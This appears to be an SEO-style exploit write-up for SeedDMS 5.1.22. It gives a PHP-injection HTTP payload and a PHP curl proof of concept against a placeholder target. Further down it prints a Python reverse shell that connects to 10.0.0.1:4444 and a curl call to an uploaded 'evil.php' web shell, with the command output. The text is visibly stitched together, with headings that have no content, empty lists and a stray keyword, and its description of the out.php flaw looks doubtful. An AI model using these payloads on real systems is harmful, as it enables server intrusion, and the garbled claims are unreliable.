Seeddms 5.1.22 Exploit Verified May 2026

SeedDMS 5.1.22 Vulnerability Analysis and Exploit

Introduction

SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.

Vulnerability Analysis

The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.

Exploit Details

The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:

Exploit Code

The following is an example of the exploit code:

POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1

Exploitation Steps

  1. The attacker sends the malicious request to the out.php file with the exploit code.
  2. The server executes the malicious PHP code, which returns the output of the id command.
  3. The attacker can then use the output to gain further information about the system and potentially escalate privileges.

Proof of Concept

The following is a proof of concept code that demonstrates the exploit:

<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
    'folder' => 'system(\'id\')',
    'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;

Mitigation and Recommendations

To mitigate this vulnerability, it is recommended to:

  1. Upgrade to SeedDMS version 5.1.23 or later, which fixes the vulnerability.
  2. Implement proper input validation and sanitization for all user-input parameters.
  3. Use a web application firewall (WAF) to detect and block suspicious traffic.

Conclusion

The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks. seeddms 5.1.22 exploit

Part 5: Detection – How to Know If You've Been Hacked

Vulnerability 1: Pre-Authentication SQL Injection (CVE-2021-3397)

Weaponization

Attackers can then:

Example reverse shell (URL encoded):

/seeddms51/conf/settings.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'

The Flaw

SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.

Step 5: Gaining Code Execution

Once the shell's URL is confirmed:

curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"

Output: uid=33(www-data) gid=33(www-data) ... SeedDMS 5

From here, the attacker can:

Exploitability & risk

Suggested timeline for responders

  1. Immediately block public access to upload functionality if feasible.
  2. Check for and remove suspicious files; preserve copies for forensics.
  3. Rotate credentials and secrets that may have been exposed.
  4. Apply vendor patch or upgrade.
  5. Review logs and assess scope of compromise.